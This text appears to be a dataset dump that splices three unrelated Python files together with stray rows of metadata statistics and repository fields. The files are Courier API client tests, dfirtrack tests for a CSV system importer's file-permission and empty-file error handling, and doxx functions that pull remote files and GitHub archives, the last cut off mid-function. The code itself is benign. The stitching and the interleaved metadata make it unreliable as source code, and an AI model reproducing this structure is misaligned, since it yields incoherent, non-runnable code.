        content_type='application/json',
        body='{"runId": "12345"}'
    )

    client = Courier(auth_token='123456789ABCDF')
    result = client.automations.invoke(
        automation={'steps': [{ 'action': 'send' }]},
        brand='W50NC77P524K14M5300PGPEK4JMJ',
        data={'foo': 'bar'},
        profile={'email': 'test@example.com'},
        recipient='4321',
        template='template-001'
    )

    # Decode what was actually sent over the wire.
    sent = json.loads(
        responses.calls[0].request.body.decode('utf-8'))
    assert result == {"runId": "12345"}
    assert sent["automation"] == {'steps': [{ 'action': 'send' }]}
    assert sent["brand"] == 'W50NC77P524K14M5300PGPEK4JMJ'
    assert sent["data"] == {'foo': 'bar'}
    assert sent["profile"] == {'email': 'test@example.com'}
    assert sent["recipient"] == '4321'
    assert sent["template"] == 'template-001'
@responses.activate
def test_fail_invoke():
    """A 5xx response from the API surfaces as CourierAPIException."""
    responses.add(
        responses.POST,
        'https://api.courier.com/automations/invoke',
        status=500,
        content_type='application/json',
        body='{"message": "An error occured"}'
    )

    client = Courier(auth_token='123456789ABCDF')
    with pytest.raises(CourierAPIException):
        client.automations.invoke(automation={})
@responses.activate
def test_success_invoke_template():
    """invoke_template() POSTs to the template-specific URL and returns the decoded body."""
    responses.add(
        responses.POST,
        'https://api.courier.com/automations/my-automation-template/invoke',
        status=200,
        content_type='application/json',
        body='{"runId": "12345"}'
    )
    c = Courier(auth_token='123456789ABCDF')
    r = c.automations.invoke_template(
        template_id='my-automation-template',
        brand='W50NC77P524K14M5300PGPEK4JMJ',
        data={'foo': 'bar'},
        profile={'email': 'test@example.com'},
        recipient='4321',
        template='template-001'
    )
    # Decode what was actually sent over the wire.
    request_params = json.loads(
        responses.calls[0].request.body.decode('utf-8'))
    assert r == {"runId": "12345"}
    # template_id goes into the URL, not the payload, so it is not asserted here.
    assert request_params["brand"] == 'W50NC77P524K14M5300PGPEK4JMJ'
    assert request_params["data"] == {'foo': 'bar'}
    assert request_params["profile"] == {'email': 'test@example.com'}
    assert request_params["recipient"] == '4321'
    assert request_params["template"] == 'template-001'
@responses.activate
def test_fail_invoke_template():
    """A 5xx response from the template endpoint surfaces as CourierAPIException."""
    responses.add(
        responses.POST,
        'https://api.courier.com/automations/my-automation-template/invoke',
        status=500,
        content_type='application/json',
        body='{"message": "An error occured"}'
    )
    c = Courier(auth_token='123456789ABCDF')
    with pytest.raises(CourierAPIException):
        c.automations.invoke_template(template_id='my-automation-template')
| 32.452632
| 76
| 0.647421
| 320
| 3,083
| 6.128125
| 0.221875
| 0.086181
| 0.106578
| 0.048955
| 0.899031
| 0.899031
| 0.867415
| 0.867415
| 0.867415
| 0.828659
| 0
| 0.063158
| 0.198832
| 3,083
| 94
| 77
| 32.797872
| 0.730769
| 0
| 0
| 0.722892
| 0
| 0
| 0.290626
| 0.0506
| 0
| 0
| 0
| 0
| 0.156627
| 1
| 0.048193
| false
| 0
| 0.072289
| 0
| 0.120482
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
046f31610d0817246ce89f57dede49d258bb65bb
| 20,376
|
py
|
Python
|
Incident-Response/Tools/dfirtrack/dfirtrack_main/tests/system_importer/test_system_importer_file_csv_check_content_file_system.py
|
sn0b4ll/Incident-Playbook
|
cf519f58fcd4255674662b3620ea97c1091c1efb
|
[
"MIT"
] | 1
|
2021-07-24T17:22:50.000Z
|
2021-07-24T17:22:50.000Z
|
Incident-Response/Tools/dfirtrack/dfirtrack_main/tests/system_importer/test_system_importer_file_csv_check_content_file_system.py
|
sn0b4ll/Incident-Playbook
|
cf519f58fcd4255674662b3620ea97c1091c1efb
|
[
"MIT"
] | 2
|
2022-02-28T03:40:31.000Z
|
2022-02-28T03:40:52.000Z
|
Incident-Response/Tools/dfirtrack/dfirtrack_main/tests/system_importer/test_system_importer_file_csv_check_content_file_system.py
|
sn0b4ll/Incident-Playbook
|
cf519f58fcd4255674662b3620ea97c1091c1efb
|
[
"MIT"
] | 2
|
2022-02-25T08:34:51.000Z
|
2022-03-16T17:29:44.000Z
|
from django.contrib.auth.models import User
from django.contrib.messages import get_messages
from django.test import TestCase
from django.utils import timezone
from dfirtrack.settings import BASE_DIR
from dfirtrack_main.importer.file.csv import system_cron
from dfirtrack_main.tests.system_importer.config_functions import set_csv_import_username, set_csv_import_filename, set_csv_import_path
import os
import urllib.parse
def create_file_no_read_permission(csv_import_path, csv_import_filename):
    """Create ``csv_import_path/csv_import_filename`` and strip all permissions.

    Used by the importer tests to provoke "no read permission" errors.
    The file content is deliberately not valid CSV; only the permission
    bits matter to the callers.
    """
    # build csv file path
    csv_path = f'{csv_import_path}/{csv_import_filename}'
    # context manager guarantees the handle is closed even if write fails
    # (original opened/closed manually and could leak on error)
    with open(csv_path, 'w') as csv_file:
        csv_file.write('This is no valid CSV file but that does not matter at the moment.')
    # remove all permissions (mode 0) so any read attempt fails
    os.chmod(csv_path, 0o000)
class SystemImporterFileCsvCheckConfigContentFileSystemViewTestCase(TestCase):
""" system importer file CSV view tests """
@classmethod
def setUpTestData(cls):
""" one-time setup """
# create users
test_user = User.objects.create_user(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
User.objects.create_user(username='message_user', password='8LHVC5R5D1bdVBJk56xn')
# change config
set_csv_import_username(test_user)
""" path not existing """
def test_system_importer_file_csv_check_content_file_system_create_cron_path_not_existing(self):
""" test importer view """
# change config
set_csv_import_path('/path_not_existing')
# login testuser
self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
# create url
destination = urllib.parse.quote('/system/', safe='/')
# get response
response = self.client.get('/system/importer/file/csv/cron/', follow=True)
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
self.assertEqual(messages[0].message, 'CSV import path does not exist. Check config or file system!')
self.assertEqual(messages[0].level_tag, 'error')
def test_system_importer_file_csv_check_content_file_system_cron_path_not_existing(self):
""" test importer view """
# change config
set_csv_import_path('/path_not_existing')
# execute cron job / scheduled task
system_cron()
# login testuser
self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
# get response
response = self.client.get('/system/')
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertEqual(str(response.context['user']), 'testuser_system_importer_file_csv_check_content_file_system')
self.assertEqual(messages[0].message, '[Scheduled task CSV system importer] CSV import path does not exist. Check config or file system!')
self.assertEqual(messages[0].level_tag, 'error')
# switch user context
self.client.logout()
self.client.login(username='message_user', password='8LHVC5R5D1bdVBJk56xn')
# get response
response = self.client.get('/system/')
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertEqual(str(response.context['user']), 'message_user')
self.assertEqual(messages[0].message, '[Scheduled task CSV system importer] CSV import path does not exist. Check config or file system!')
self.assertEqual(messages[0].level_tag, 'error')
def test_system_importer_file_csv_check_content_file_system_instant_path_not_existing(self):
""" test importer view """
# change config
set_csv_import_path('/path_not_existing')
# login testuser
self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
# create url
destination = urllib.parse.quote('/system/', safe='/')
# get response
response = self.client.get('/system/importer/file/csv/instant/', follow=True)
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
self.assertEqual(messages[0].message, 'CSV import path does not exist. Check config or file system!')
self.assertEqual(messages[0].level_tag, 'error')
""" path no read permission """
def test_system_importer_file_csv_check_content_file_system_create_cron_path_no_read_permission(self):
""" test importer view """
# change config
set_csv_import_path('/root')
# login testuser
self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
# create url
destination = urllib.parse.quote('/system/', safe='/')
# get response
response = self.client.get('/system/importer/file/csv/cron/', follow=True)
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
self.assertEqual(messages[0].message, 'No read permission for CSV import path. Check config or file system!')
self.assertEqual(messages[0].level_tag, 'error')
def test_system_importer_file_csv_check_content_file_system_cron_path_no_read_permission(self):
""" test importer view """
# change config
set_csv_import_path('/root')
# execute cron job / scheduled task
system_cron()
# login testuser
self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
# get response
response = self.client.get('/system/')
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertEqual(str(response.context['user']), 'testuser_system_importer_file_csv_check_content_file_system')
self.assertEqual(messages[0].message, '[Scheduled task CSV system importer] No read permission for CSV import path. Check config or file system!')
self.assertEqual(messages[0].level_tag, 'error')
# switch user context
self.client.logout()
self.client.login(username='message_user', password='8LHVC5R5D1bdVBJk56xn')
# get response
response = self.client.get('/system/')
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertEqual(str(response.context['user']), 'message_user')
self.assertEqual(messages[0].message, '[Scheduled task CSV system importer] No read permission for CSV import path. Check config or file system!')
self.assertEqual(messages[0].level_tag, 'error')
def test_system_importer_file_csv_check_content_file_system_instant_path_no_read_permission(self):
""" test importer view """
# change config
set_csv_import_path('/root')
# login testuser
self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
# create url
destination = urllib.parse.quote('/system/', safe='/')
# get response
response = self.client.get('/system/importer/file/csv/instant/', follow=True)
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
self.assertEqual(messages[0].message, 'No read permission for CSV import path. Check config or file system!')
self.assertEqual(messages[0].level_tag, 'error')
""" file not existing """
def test_system_importer_file_csv_check_content_file_system_create_cron_file_not_existing(self):
""" test importer view """
# change config
set_csv_import_path('/tmp')
# change config
set_csv_import_filename('filename_not_existing.abc')
# login testuser
self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
# create url
destination = urllib.parse.quote('/system/', safe='/')
# get response
response = self.client.get('/system/importer/file/csv/cron/', follow=True)
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
self.assertEqual(messages[0].message, 'CSV import file does not exist. Check config or provide file!')
self.assertEqual(messages[0].level_tag, 'error')
def test_system_importer_file_csv_check_content_file_system_cron_file_not_existing(self):
""" test importer view """
# change config
set_csv_import_path('/tmp')
# change config
set_csv_import_filename('filename_not_existing.abc')
# execute cron job / scheduled task
system_cron()
# login testuser
self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
# get response
response = self.client.get('/system/')
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertEqual(str(response.context['user']), 'testuser_system_importer_file_csv_check_content_file_system')
self.assertEqual(messages[0].message, '[Scheduled task CSV system importer] CSV import file does not exist. Check config or provide file!')
self.assertEqual(messages[0].level_tag, 'error')
# switch user context
self.client.logout()
self.client.login(username='message_user', password='8LHVC5R5D1bdVBJk56xn')
# get response
response = self.client.get('/system/')
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertEqual(str(response.context['user']), 'message_user')
self.assertEqual(messages[0].message, '[Scheduled task CSV system importer] CSV import file does not exist. Check config or provide file!')
self.assertEqual(messages[0].level_tag, 'error')
def test_system_importer_file_csv_check_content_file_system_instant_file_not_existing(self):
""" test importer view """
# change config
set_csv_import_path('/tmp')
# change config
set_csv_import_filename('filename_not_existing.abc')
# login testuser
self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
# create url
destination = urllib.parse.quote('/system/', safe='/')
# get response
response = self.client.get('/system/importer/file/csv/instant/', follow=True)
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
self.assertEqual(messages[0].message, 'CSV import file does not exist. Check config or provide file!')
self.assertEqual(messages[0].level_tag, 'error')
""" file no read permission """
def test_system_importer_file_csv_check_content_file_system_create_cron_file_no_read_permission(self):
    """Creating a cron task for an unreadable CSV file redirects and reports an error."""
    # build a unique, timestamped filename and create it without read permission
    timestamp = timezone.now().strftime('%Y%m%d_%H%M%S')
    import_path = '/tmp'
    import_filename = f'{timestamp}_create_cron_no_read_permission.csv'
    create_file_no_read_permission(import_path, import_filename)
    # point the importer config at the unreadable file
    set_csv_import_path(import_path)
    set_csv_import_filename(import_filename)
    # authenticate as the importer test user
    self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
    # expected redirect target after the failed import
    destination = urllib.parse.quote('/system/', safe='/')
    # trigger the cron importer view and follow the redirect
    response = self.client.get('/system/importer/file/csv/cron/', follow=True)
    # collect the flash messages attached to the request
    messages = list(get_messages(response.wsgi_request))
    # importer bounces back to the system list with an error message
    self.assertRedirects(response, destination, status_code=302, target_status_code=200)
    self.assertEqual(messages[0].message, 'No read permission for CSV import file. Check config or file system!')
    self.assertEqual(messages[0].level_tag, 'error')
def test_system_importer_file_csv_check_content_file_system_cron_file_no_read_permission(self):
    """Scheduled import of an unreadable CSV file flags an error to every user."""
    # build a unique, timestamped filename and create it without read permission
    timestamp = timezone.now().strftime('%Y%m%d_%H%M%S')
    import_path = '/tmp'
    import_filename = f'{timestamp}_cron_no_read_permission.csv'
    create_file_no_read_permission(import_path, import_filename)
    # point the importer config at the unreadable file
    set_csv_import_path(import_path)
    set_csv_import_filename(import_filename)
    # run the scheduled task
    system_cron()
    # the importing user sees the scheduled-task error message
    self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
    response = self.client.get('/system/')
    messages = list(get_messages(response.wsgi_request))
    self.assertEqual(str(response.context['user']), 'testuser_system_importer_file_csv_check_content_file_system')
    self.assertEqual(messages[0].message, '[Scheduled task CSV system importer] No read permission for CSV import file. Check config or file system!')
    self.assertEqual(messages[0].level_tag, 'error')
    # an unrelated user sees the same scheduled-task error message
    self.client.logout()
    self.client.login(username='message_user', password='8LHVC5R5D1bdVBJk56xn')
    response = self.client.get('/system/')
    messages = list(get_messages(response.wsgi_request))
    self.assertEqual(str(response.context['user']), 'message_user')
    self.assertEqual(messages[0].message, '[Scheduled task CSV system importer] No read permission for CSV import file. Check config or file system!')
    self.assertEqual(messages[0].level_tag, 'error')
def test_system_importer_file_csv_check_content_file_system_instant_file_no_read_permission(self):
    """Instant import of an unreadable CSV file redirects and reports an error."""
    # build a unique, timestamped filename and create it without read permission
    timestamp = timezone.now().strftime('%Y%m%d_%H%M%S')
    import_path = '/tmp'
    import_filename = f'{timestamp}_instant_no_read_permission.csv'
    create_file_no_read_permission(import_path, import_filename)
    # point the importer config at the unreadable file
    set_csv_import_path(import_path)
    set_csv_import_filename(import_filename)
    # authenticate as the importer test user
    self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
    # expected redirect target after the failed import
    destination = urllib.parse.quote('/system/', safe='/')
    # trigger the instant importer and follow the redirect
    response = self.client.get('/system/importer/file/csv/instant/', follow=True)
    # collect the flash messages attached to the request
    messages = list(get_messages(response.wsgi_request))
    # importer bounces back to the system list with an error message
    self.assertRedirects(response, destination, status_code=302, target_status_code=200)
    self.assertEqual(messages[0].message, 'No read permission for CSV import file. Check config or file system!')
    self.assertEqual(messages[0].level_tag, 'error')
""" file empty """
def test_system_importer_file_csv_check_content_file_system_create_cron_file_empty(self):
    """Creating a cron task for an empty CSV file redirects and reports an error."""
    # point the importer config at the empty test fixture file
    set_csv_import_path(os.path.join(BASE_DIR, 'dfirtrack_main/tests/system_importer/system_importer_file_csv_files/'))
    set_csv_import_filename('system_importer_file_csv_testfile_06_empty.csv')
    # authenticate as the importer test user
    self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
    # expected redirect target after the failed import
    destination = urllib.parse.quote('/system/', safe='/')
    # trigger the cron importer view and follow the redirect
    response = self.client.get('/system/importer/file/csv/cron/', follow=True)
    # collect the flash messages attached to the request
    messages = list(get_messages(response.wsgi_request))
    # importer bounces back to the system list with an error message
    self.assertRedirects(response, destination, status_code=302, target_status_code=200)
    self.assertEqual(messages[0].message, 'CSV import file is empty. Check config or file system!')
    self.assertEqual(messages[0].level_tag, 'error')
def test_system_importer_file_csv_check_content_file_system_cron_file_empty(self):
    """Scheduled import of an empty CSV file flags an error to every user."""
    # point the importer config at the empty test fixture file
    set_csv_import_path(os.path.join(BASE_DIR, 'dfirtrack_main/tests/system_importer/system_importer_file_csv_files/'))
    set_csv_import_filename('system_importer_file_csv_testfile_06_empty.csv')
    # run the scheduled task
    system_cron()
    # the importing user sees the scheduled-task error message
    self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
    response = self.client.get('/system/')
    messages = list(get_messages(response.wsgi_request))
    self.assertEqual(str(response.context['user']), 'testuser_system_importer_file_csv_check_content_file_system')
    self.assertEqual(messages[0].message, '[Scheduled task CSV system importer] CSV import file is empty. Check config or file system!')
    self.assertEqual(messages[0].level_tag, 'error')
    # an unrelated user sees the same scheduled-task error message
    self.client.logout()
    self.client.login(username='message_user', password='8LHVC5R5D1bdVBJk56xn')
    response = self.client.get('/system/')
    messages = list(get_messages(response.wsgi_request))
    self.assertEqual(str(response.context['user']), 'message_user')
    self.assertEqual(messages[0].message, '[Scheduled task CSV system importer] CSV import file is empty. Check config or file system!')
    self.assertEqual(messages[0].level_tag, 'error')
def test_system_importer_file_csv_check_content_file_system_instant_file_empty(self):
    """Instant import of an empty CSV file redirects and reports an error."""
    # point the importer config at the empty test fixture file
    set_csv_import_path(os.path.join(BASE_DIR, 'dfirtrack_main/tests/system_importer/system_importer_file_csv_files/'))
    set_csv_import_filename('system_importer_file_csv_testfile_06_empty.csv')
    # authenticate as the importer test user
    self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
    # expected redirect target after the failed import
    destination = urllib.parse.quote('/system/', safe='/')
    # trigger the instant importer and follow the redirect
    response = self.client.get('/system/importer/file/csv/instant/', follow=True)
    # collect the flash messages attached to the request
    messages = list(get_messages(response.wsgi_request))
    # importer bounces back to the system list with an error message
    self.assertRedirects(response, destination, status_code=302, target_status_code=200)
    self.assertEqual(messages[0].message, 'CSV import file is empty. Check config or file system!')
    self.assertEqual(messages[0].level_tag, 'error')
| 47.276102
| 154
| 0.699352
| 2,461
| 20,376
| 5.509955
| 0.0577
| 0.047124
| 0.059735
| 0.08208
| 0.942847
| 0.932153
| 0.932153
| 0.929056
| 0.928761
| 0.928761
| 0
| 0.011327
| 0.202739
| 20,376
| 430
| 155
| 47.386047
| 0.823392
| 0.114596
| 0
| 0.812207
| 0
| 0.018779
| 0.272825
| 0.120337
| 0
| 0
| 0
| 0
| 0.28169
| 1
| 0.079812
| false
| 0.103286
| 0.525822
| 0
| 0.615023
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 10
|
0482fcfc2f6bb3c65e8da083cd19ff380676c1a8
| 12,161
|
py
|
Python
|
lib/doxx/datatypes/remotefiles.py
|
joesantana/doxx
|
08b89597792ce6c9e795c8bb11001a3a69c1f22c
|
[
"MIT"
] | null | null | null |
lib/doxx/datatypes/remotefiles.py
|
joesantana/doxx
|
08b89597792ce6c9e795c8bb11001a3a69c1f22c
|
[
"MIT"
] | null | null | null |
lib/doxx/datatypes/remotefiles.py
|
joesantana/doxx
|
08b89597792ce6c9e795c8bb11001a3a69c1f22c
|
[
"MIT"
] | 1
|
2021-07-17T22:59:12.000Z
|
2021-07-17T22:59:12.000Z
|
#!/usr/bin/env python
# encoding: utf-8
from os import remove
import os.path
from multiprocessing import Process, Lock
from Naked.toolshed.system import stderr, stdout, file_exists
from doxx.commands.pull import pull_binary_file, pull_text_file
from doxx.commands.unpack import unpack_run
from doxx.utilities.filesystem import _create_dirs, _make_os_dependent_path
########################################
#
# [pull_textfile_runner]
# public function
# - pull remote text files
#
########################################
def pull_textfile_runner(text_url_dict):
    """Pull remote text files to the local filesystem (public function).

    *text_url_dict* maps local outfile paths to the remote URLs to fetch.
    A single file is pulled in-process; multiple files are pulled in one
    worker process each.
    """
    local_paths = list(text_url_dict)  # local outfile names
    if not local_paths:
        stderr("[!] doxx: Unable to find text files to pull in the key file", exit=0)
    elif len(local_paths) == 1:
        # single text file pull, performed in the current process
        target = local_paths[0]
        _pull_textfile(target, text_url_dict[target])  # key is local write path, value is the URL
    else:
        # one worker process per requested file
        outputlock = Lock()  # serializes stdout / stderr writes
        iolock = Lock()      # serializes filesystem directory creation
        workers = []
        for target in local_paths:
            worker = Process(target=_pull_textfile_multiprocess,
                             args=(target, text_url_dict[target], outputlock, iolock))
            worker.start()
            workers.append(worker)
        for worker in workers:
            worker.join(timeout=60)
########################################
#
# [pull_binaryfile_runner]
# public function
# - pull remote binary files
#
########################################
def pull_binaryfile_runner(binary_url_dict):
    """Pull remote binary files to the local filesystem (public function).

    *binary_url_dict* maps local outfile paths to the remote URLs to fetch.
    A single file is pulled in-process; multiple files are pulled in one
    worker process each.
    """
    local_paths = list(binary_url_dict)  # local outfile names
    if not local_paths:
        stderr("[!] doxx: Unable to find binary files to pull in the key file", exit=0)
    elif len(local_paths) == 1:
        # single binary file pull, performed in the current process
        target = local_paths[0]
        _pull_binaryfile(target, binary_url_dict[target])  # key is local write path, value is the URL
    else:
        # one worker process per requested file
        outputlock = Lock()  # serializes stdout / stderr writes
        iolock = Lock()      # serializes filesystem directory creation
        workers = []
        for target in local_paths:
            worker = Process(target=_pull_binaryfile_multiprocess,
                             args=(target, binary_url_dict[target], outputlock, iolock))
            worker.start()
            workers.append(worker)
        for worker in workers:
            worker.join(timeout=60)
###########################################
#
# [pull_github_repo_runner]
# public function
# - pull remote Github repo archives
#
###########################################
def pull_github_repo_runner(repo_url_dict):
    """Pull remote Github repository archives to the local filesystem and unpack them (public function).

    *repo_url_dict* maps local outfile paths to remote archive URLs.
    A single archive is pulled in-process; multiple archives are pulled in
    one worker process each (with a longer join timeout than plain files).
    """
    local_paths = list(repo_url_dict)  # local outfile names
    if not local_paths:
        stderr("[!] doxx: Unable to find binary files to pull in the key file", exit=0)
    elif len(local_paths) == 1:
        # single repository pull, performed in the current process
        stdout("[*] doxx: Hang in there. Pulling an entire repository. This may take a bit of time...")
        target = local_paths[0]
        _pull_github_repo(target, repo_url_dict[target])  # key is local write path, value is the URL
    else:
        # one worker process per requested repository archive
        stdout("[*] doxx: Hang in there. Pulling " + str(len(local_paths)) + " entire repositories. This may take a bit of time...")
        outputlock = Lock()  # serializes stdout / stderr writes
        iolock = Lock()      # serializes filesystem directory creation
        workers = []
        for target in local_paths:
            worker = Process(target=_pull_github_repo_multiprocess,
                             args=(target, repo_url_dict[target], outputlock, iolock))
            worker.start()
            workers.append(worker)
        for worker in workers:
            worker.join(timeout=120)
###############################################
#
# [_pull_textfile]
# private function
# - execute single process text file pulls
#
###############################################
def _pull_textfile(file_path, url):
    """Pull a single remote text file from *url* and write it to *file_path* (private function).

    Exits the process (via Naked's stderr exit=1) if the pull raises or
    the file cannot be found locally afterwards.
    """
    # create OS dependent file path (if necessary)
    file_path = _make_os_dependent_path(file_path)
    # make directory structure if necessary for the file path
    # NOTE: truthiness test replaces the former `is not ""` identity
    # comparison, which relies on string interning and raises a
    # SyntaxWarning on Python >= 3.8
    if os.path.dirname(file_path):
        _create_dirs(file_path)
    # pull the file and write to local filesystem
    try:
        pull_text_file(url, file_path)
    except Exception as e:
        stderr("[!] doxx: Unable to pull '" + file_path + "' from '" + url + "'. Error: " + str(e), exit=1)
    if file_exists(file_path):
        stdout("[+] doxx: '" + file_path + "' ...check!")
    else:
        stderr("[!] doxx: There was an error pulling '" + file_path + "'. Error: Unable to locate local file.", exit=1)
########################################
#
# [_pull_textfile_multiprocess]
# private function
# - execute multi-file, multiprocess
# text file pulls
#
########################################
def _pull_textfile_multiprocess(file_path, url, outputlock, iolock):
    """Pull a single remote text file inside a worker process (private function).

    *outputlock* serializes stdout/stderr writes across workers; *iolock*
    serializes directory creation. Errors are reported without exiting
    (exit=0) so sibling workers can finish.
    """
    # create OS dependent file path (if necessary)
    file_path = _make_os_dependent_path(file_path)
    # make directory structure if necessary for the file path
    # NOTE: truthiness test replaces the former `is not ""` identity
    # comparison, which relies on string interning and raises a
    # SyntaxWarning on Python >= 3.8
    if os.path.dirname(file_path):
        iolock.acquire()
        _create_dirs(file_path)
        iolock.release()
    # pull the file and write to local filesystem
    try:
        pull_text_file(url, file_path)
    except Exception as e:
        outputlock.acquire()
        stderr("[!] doxx: Unable to pull '" + file_path + "' from '" + url + "'. Error: " + str(e), exit=0)
        outputlock.release()
    if file_exists(file_path):
        outputlock.acquire()
        stdout("[+] doxx: '" + file_path + "' ...check!")
        outputlock.release()
    else:
        outputlock.acquire()
        stderr("[!] doxx: There was an error pulling '" + file_path + "'. Error: Unable to locate local file", exit=0)
        outputlock.release()
########################################
#
# [_pull_binaryfile]
# private function
# - execute single process binary
# file pulls
#
########################################
def _pull_binaryfile(file_path, url):
    """Pull a single remote binary file from *url* and write it to *file_path* (private function).

    Reports a pull failure without exiting (exit=0), but exits (exit=1)
    if the file cannot be found locally afterwards.
    """
    # create OS dependent file path (if necessary)
    file_path = _make_os_dependent_path(file_path)
    # make directory structure if necessary for the file path
    # NOTE: truthiness test replaces the former `is not ""` identity
    # comparison, which relies on string interning and raises a
    # SyntaxWarning on Python >= 3.8
    if os.path.dirname(file_path):
        _create_dirs(file_path)
    # pull the file and write to local filesystem
    try:
        pull_binary_file(url, file_path)
    except Exception as e:
        stderr("[!] doxx: Unable to pull '" + file_path + "' from '" + url + "'. Error: " + str(e), exit=0)
    if file_exists(file_path):
        stdout("[+] doxx: '" + file_path + "' ...check!")
    else:
        stderr("[!] doxx: There was an error pulling '" + file_path + "'. Error: Unable to locate local file.", exit=1)
########################################
#
# [_pull_binaryfile_multiprocess]
# private function
# - execute multiprocess multi-file
# binary file pulls
#
########################################
def _pull_binaryfile_multiprocess(file_path, url, outputlock, iolock):
    """Pull a single remote binary file inside a worker process (private function).

    *outputlock* serializes stdout/stderr writes across workers; *iolock*
    serializes directory creation. Errors are reported without exiting
    (exit=0) so sibling workers can finish.
    """
    # create OS dependent file path (if necessary)
    file_path = _make_os_dependent_path(file_path)
    # make directory structure if necessary for the file path
    # NOTE: truthiness test replaces the former `is not ""` identity
    # comparison, which relies on string interning and raises a
    # SyntaxWarning on Python >= 3.8
    if os.path.dirname(file_path):
        iolock.acquire()
        _create_dirs(file_path)
        iolock.release()
    # pull the file and write to local filesystem
    try:
        pull_binary_file(url, file_path)
    except Exception as e:
        outputlock.acquire()
        stderr("[!] doxx: Unable to pull '" + file_path + "' from '" + url + "'. Error: " + str(e), exit=0)
        outputlock.release()
    if file_exists(file_path):
        outputlock.acquire()
        stdout("[+] doxx: '" + file_path + "' ...check!")
        outputlock.release()
    else:
        outputlock.acquire()
        stderr("[!] doxx: There was an error pulling '" + file_path + "'. Error: Unable to locate local file", exit=0)
        outputlock.release()
########################################
#
# [_pull_github_repo]
# private function
# - execute single process Github
# repository archive pulls
#
########################################
def _pull_github_repo(file_path, url):
    """Pull a Github repository archive, unpack it, and delete the archive (private function).

    Reports a pull failure without exiting (exit=0), but exits (exit=1)
    if the archive cannot be found locally afterwards.
    """
    # create OS dependent file path (if necessary)
    file_path = _make_os_dependent_path(file_path)
    # make directory structure if necessary for the file path
    # NOTE: truthiness test replaces the former `is not ""` identity
    # comparison, which relies on string interning and raises a
    # SyntaxWarning on Python >= 3.8
    if os.path.dirname(file_path):
        _create_dirs(file_path)
    # pull the file and write to local filesystem
    try:
        pull_binary_file(url, file_path)
    except Exception as e:
        stderr("[!] doxx: Unable to pull the archive file from the URL '" + url + "'. Error: " + str(e), exit=0)
    if file_exists(file_path):
        # unpack the archive, then remove it, keeping only the extracted tree
        root_dir = unpack_run(file_path)
        remove(file_path)
        stdout("[+] doxx: '" + root_dir + "' ...check!")
    else:
        stderr("[!] doxx: There was an error pulling the repository file. Error: Unable to locate local archive file.", exit=1)
########################################
#
# [_pull_github_repo_multiprocess]
# private function
# - execute multiprocess multi-file
# Github repo archive pulls
#
########################################
def _pull_github_repo_multiprocess(file_path, url, outputlock, iolock):
    """Pull and unpack a Github repository archive inside a worker process (private function).

    *outputlock* serializes stdout/stderr writes across workers; *iolock*
    serializes directory creation. A pull failure is reported without
    exiting (exit=0); a missing archive afterwards exits (exit=1).
    """
    # create OS dependent file path (if necessary)
    file_path = _make_os_dependent_path(file_path)
    # make directory structure if necessary for the file path
    # NOTE: truthiness test replaces the former `is not ""` identity
    # comparison, which relies on string interning and raises a
    # SyntaxWarning on Python >= 3.8
    if os.path.dirname(file_path):
        iolock.acquire()
        _create_dirs(file_path)
        iolock.release()
    # pull the file and write to local filesystem
    try:
        pull_binary_file(url, file_path)
    except Exception as e:
        outputlock.acquire()
        stderr("[!] doxx: Unable to pull the archive file from the URL '" + url + "'. Error: " + str(e), exit=0)
        outputlock.release()
    if file_exists(file_path):
